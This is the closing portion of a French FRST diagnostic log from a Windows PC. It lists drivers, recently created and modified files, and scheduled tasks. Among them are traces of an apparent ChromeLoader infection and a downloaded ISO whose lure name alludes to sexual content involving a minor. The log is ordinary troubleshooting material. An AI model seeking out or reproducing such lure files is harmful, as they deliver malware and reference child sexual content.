R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435424 2021-11-06] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86240 2021-11-06] (Microsoft Windows -> Microsoft Corporation)
R3 WINIO; C:\Program Files (x86)\MSI\MSI NBFoundation Service\KernCoreLib64.sys [25656 2018-11-15] (Micro-Star International CO., LTD. -> )
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\wpCtrlDrv.sys [1015760 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
S3 xhunter1; C:\Windows\xhunter1.sys [2719256 2021-01-13] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-06 13:44 - 2022-01-06 13:45 - 000050196 _____ C:\Users\tibur\Downloads\FRST.txt
2022-01-06 13:40 - 2022-01-06 13:44 - 000000000 ____D C:\FRST
2022-01-06 00:41 - 2022-01-06 00:41 - 000000000 ____D C:\WINDOWS\system32\Tasks\Remediation
2022-01-05 22:06 - 2022-01-05 22:06 - 000004172 _____ C:\WINDOWS\system32\Tasks\Opera GX scheduled Autoupdate 1641416756
2022-01-05 22:06 - 2022-01-05 22:06 - 000000000 ____D C:\Users\tibur\AppData\Local\Opera Software
2022-01-05 22:05 - 2022-01-05 22:05 - 000001439 _____ C:\Users\tibur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera GX.lnk
2022-01-05 22:04 - 2022-01-05 22:04 - 003357432 _____ (Opera Software) C:\Users\tibur\Downloads\OperaGXSetup.exe
2022-01-05 22:04 - 2022-01-05 22:04 - 000000000 ____D C:\Users\tibur\AppData\Roaming\Opera Software
2022-01-05 21:41 - 2022-01-05 21:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2022-01-05 21:41 - 2022-01-05 21:41 - 000000000 ____D C:\Program Files\VS Revo Group
2022-01-05 21:40 - 2022-01-05 21:40 - 007511448 _____ (VS Revo Group ) C:\Users\tibur\Downloads\revosetup.exe
2022-01-05 21:09 - 2022-01-05 21:09 - 000000000 ____D C:\Users\tibur\AppData\Local\Norton
2022-01-05 20:59 - 2022-01-05 20:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Norton Security
2022-01-05 20:54 - 2022-01-05 20:54 - 000003378 _____ C:\WINDOWS\system32\Tasks\Norton WSC Integration
2022-01-05 20:54 - 2022-01-05 20:54 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2022-01-05 20:20 - 2022-01-05 20:20 - 000000000 ____D C:\Users\tibur\AppData\Local\chrome
2022-01-05 20:19 - 2022-01-05 20:19 - 000890880 _____ C:\Users\tibur\Downloads\Night.Attack.On.Little.Sis.Sleeptime.Fun.rar.iso
2022-01-05 20:19 - 2022-01-05 20:19 - 000012782 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2022-01-05 18:16 - 2022-01-05 18:59 - 000000000 ____D C:\Users\tibur\AppData\Roaming\electron-wrapper
2022-01-05 14:56 - 2022-01-05 14:56 - 002725311 _____ C:\Users\tibur\Downloads\1478053398545113089.mp4
2022-01-05 00:59 - 2022-01-05 01:03 - 000000000 ____D C:\Users\tibur\AppData\Local\SecondLife
2022-01-05 00:59 - 2022-01-05 01:00 - 000000000 ____D C:\Users\tibur\AppData\Roaming\SecondLife
2022-01-05 00:59 - 2022-01-05 00:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Second Life Viewer
2022-01-05 00:58 - 2022-01-05 00:59 - 000000000 ____D C:\Program Files\SecondLifeViewer
2022-01-05 00:52 - 2022-01-05 00:54 - 146604360 _____ C:\Users\tibur\Downloads\Second_Life_6_5_1_566335_x86_64_Setup.exe
2022-01-03 12:48 - 2022-01-03 12:49 - 006509408 _____ C:\Users\tibur\Downloads\forge-1.18.1-39.0.8-installer.jar
2022-01-02 10:05 - 2022-01-02 10:05 - 000002498 _____ C:\Users\tibur\Downloads\LOL_OPGG_Observer_5642542794_spectate.bat
2021-12-30 21:02 - 2021-12-30 21:02 - 000002498 _____ C:\Users\tibur\Downloads\LOL_OPGG_Observer_5638043934_spectate.bat
2021-12-23 21:56 - 2021-12-23 21:58 - 111265971 _____ C:\Users\tibur\Downloads\5587 - Pokemon - Version Noire (DSi Enhanced) (FR).zip
2021-12-23 21:50 - 2021-12-23 21:50 - 001788747 _____ C:\Users\tibur\Downloads\DeSmuME_X432R_x64_Pré-configuré.rar
2021-12-23 21:50 - 2019-06-27 12:57 - 000000000 ____D C:\Users\tibur\Downloads\DeSmuME_X432R_x64 - Copie
2021-12-23 21:45 - 2021-12-23 21:45 - 000138408 _____ C:\Users\tibur\Downloads\Snapchat-1702810573.mp4
2021-12-21 06:19 - 2021-12-21 06:21 - 000000000 ____D C:\Users\tibur\Downloads\ventoy-1.0.63
2021-12-21 06:18 - 2021-12-21 06:19 - 015399129 _____ C:\Users\tibur\Downloads\ventoy-1.0.63-windows.zip
2021-12-20 12:29 - 2021-12-20 12:29 - 000171886 _____ C:\Users\tibur\Downloads\Voitures_PV_RP_FH5.pdf
2021-12-18 14:14 - 2021-12-18 14:14 - 001045006 _____ C:\Users\tibur\Downloads\video0_5-1-1.mp4
2021-12-16 20:46 - 2021-12-16 20:46 - 000104945 _____ C:\Users\tibur\Downloads\travail -test synthese sur couche physique - cables (1).pdf
2021-12-16 20:39 - 2021-12-16 20:39 - 000017206 _____ C:\Users\tibur\Downloads\composants pc.xlsx
2021-12-16 16:45 - 2021-12-16 16:45 - 000000000 ___HD C:\$WinREAgent
2021-12-15 22:12 - 2021-12-15 22:12 - 000325904 _____ C:\Users\tibur\Downloads\1471224279429791759.mp4
2021-12-12 17:42 - 2021-12-12 17:43 - 031444360 _____ () C:\Users\tibur\Downloads\MinecraftInstaller.exe
2021-12-11 20:39 - 2021-12-11 20:39 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3716561713-2104721246-2030872134-1001
2021-12-09 13:08 - 2021-12-09 13:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi
2021-12-09 13:08 - 2021-12-09 13:08 - 000000000 ____D C:\Program Files\LGHUB

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-06 13:42 - 2020-09-04 17:19 - 000000000 ____D C:\Users\tibur\AppData\Roaming\discord
2022-01-06 13:42 - 2020-03-21 02:30 - 000000000 ____D C:\ProgramData\NVIDIA
2022-01-06 13:39 - 2020-09-23 09:01 - 000000000 ____D C:\Users\tibur\AppData\Local\LGHUB
2022-01-06 13:39 - 2020-09-04 16:45 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-06 00:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-06 00:14 - 2020-09-04 16:25 - 000000000 ____D C:\ProgramData\Common
2022-01-05 23:54 - 2020-09-04 17:19 - 000000000 ____D C:\Users\tibur\AppData\Local\Discord
2022-01-05 22:12 - 2020-09-04 18:17 - 000000000 ____D C:\ProgramData\Riot Games
2022-01-05 22:08 - 2020-09-04 17:38 - 000000000 ____D C:\Users\tibur\AppData\Local\D3DSCache
2022-01-05 21:44 - 2021-08-30 23:33 - 000002330 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-01-05 21:42 - 2021-05-09 15:38 - 000000000 ____D C:\Users\tibur\AppData\Local\Ubisoft Game Launcher
2022-01-05 21:19 - 2020-09-04 16:40 - 000000000 ____D C:\Program Files\Common Files\AV
2022-01-05 21:09 - 2020-03-21 02:59 - 000000000 ____D C:\ProgramData\Norton
2022-01-05 21:06 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-05 21:01 - 2021-03-29 20:01 - 001772722 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-01-05 21:01 - 2019-12-07 15:49 - 000792858 _____ C:\WINDOWS\system32\perfh00C.dat
2022-01-05 21:01 - 2019-12-07 15:49 - 000149988 _____ C:\WINDOWS\system32\perfc00C.dat
2022-01-05 21:01 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-01-05 20:56 - 2020-09-08 17:31 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-01-05 20:56 - 2020-09-04 16:13 - 000000000 ____D C:\Users\tibur\AppData\Local\Packages
2022-01-05 20:56 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-05 20:56 - 2019-11-13 21:30 - 000000000 ____D C:\ProgramData\Packages
2022-01-05 20:54 - 2021-05-17 14:23 - 000003112 _____ C:\WINDOWS\system32\Tasks\NahimicTask32
2022-01-05 20:54 - 2021-05-17 14:23 - 000003092 _____ C:\WINDOWS\system32\Tasks\NahimicTask64
2022-01-05 20:54 - 2020-10-15 14:38 - 000000000 ____D C:\Users\tibur\AppData\Local\LogMeIn Hamachi
2022-01-05 20:54 - 2020-09-23 09:01 - 000000000 ____D C:\Users\tibur\AppData\Roaming\LGHUB
2022-01-05 20:54 - 2020-09-16 17:09 - 000000000 ____D C:\Users\tibur\AppData\Local\Oculus
2022-01-05 20:54 - 2020-09-04 20:02 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-05 20:54 - 2020-09-04 19:03 - 000000000 ____D C:\Users\tibur\AppData\Local\Overwolf
2022-01-05 20:54 - 2020-03-21 02:59 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2022-01-05 20:54 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2022-01-05 20:54 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-01-05 20:53 - 2021-03-29 19:59 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-01-05 20:53 - 2021-03-29 19:52 - 000000000 ____D C:\Users\tibur
2022-01-05 20:53 - 2021-03-29 19:51 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-05 20:53 - 2020-11-08 23:33 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-01-05 20:53 - 2020-09-04 16:13 - 000000000 __SHD C:\Users\tibur\IntelGraphicsProfiles
2022-01-05 20:53 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2022-01-05 20:15 - 2021-03-29 19:51 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-05 19:03 - 2020-09-04 20:08 - 000000000 ____D C:\Users\tibur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-01-03 13:28 - 2020-09-06 12:15 - 000000000 ____D C:\Users\tibur\AppData\Roaming\.minecraft
2021-12-31 13:29 - 2020-09-04 19:23 - 000000000 ____D C:\Users\tibur\AppData\Local\CrashDumps
2021-12-30 09:57 - 2020-12-21 17:15 - 000000000 ____D C:\Users\tibur\AppData\LocalLow\Mozilla
2021-12-26 12:36 - 2020-09-09 19:49 - 000002449 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-12-23 17:46 - 2020-09-13 12:17 - 000000000 ____D C:\Users\tibur\AppData\Roaming\DS4Windows
2021-12-22 19:25 - 2020-09-04 19:04 - 000000000 ____D C:\Program Files (x86)\Overwolf
2021-12-22 19:19 - 2020-09-16 17:27 - 000000000 ____D C:\Program Files\Oculus
2021-12-19 12:26 - 2020-09-04 16:14 - 000000000 ____D C:\Users\tibur\AppData\Local\NVIDIA Corporation
2021-12-16 20:57 - 2020-09-04 16:30 - 002225640 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2021-12-16 20:56 - 2021-11-23 20:18 - 000116200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2021-12-16 20:56 - 2020-09-04 16:59 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2021-12-16 20:56 - 2020-09-04 16:30 - 000333288 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2021-12-16 20:56 - 2020-09-04 16:30 - 000217536 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2021-12-16 20:56 - 2020-09-04 16:30 - 000197048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2021-12-16 20:56 - 2020-09-04 16:30 - 000062952 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2021-12-12 17:43 - 2020-09-04 16:15 - 000000000 ____D C:\Users\tibur\AppData\Local\PlaceholderTileLogoFolder
2021-12-11 17:40 - 2020-09-08 16:53 - 000000000 ____D C:\Program Files\Riot Vanguard
2021-12-10 20:40 - 2021-03-29 19:59 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3716561713-2104721246-2030872134-1001
2021-12-10 20:40 - 2021-03-29 19:52 - 000002428 _____ C:\Users\tibur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

==================== Fichiers à la racine de certains dossiers ========

2020-11-23 17:19 - 2020-12-18 16:48 - 000001536 _____ () C:\Users\tibur\AppData\Local\GfxMetrics.cfg
2020-11-23 17:19 - 2020-12-18 16:48 - 000206336 _____ () C:\Users\tibur\AppData\Local\GfxMetrics.dat

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================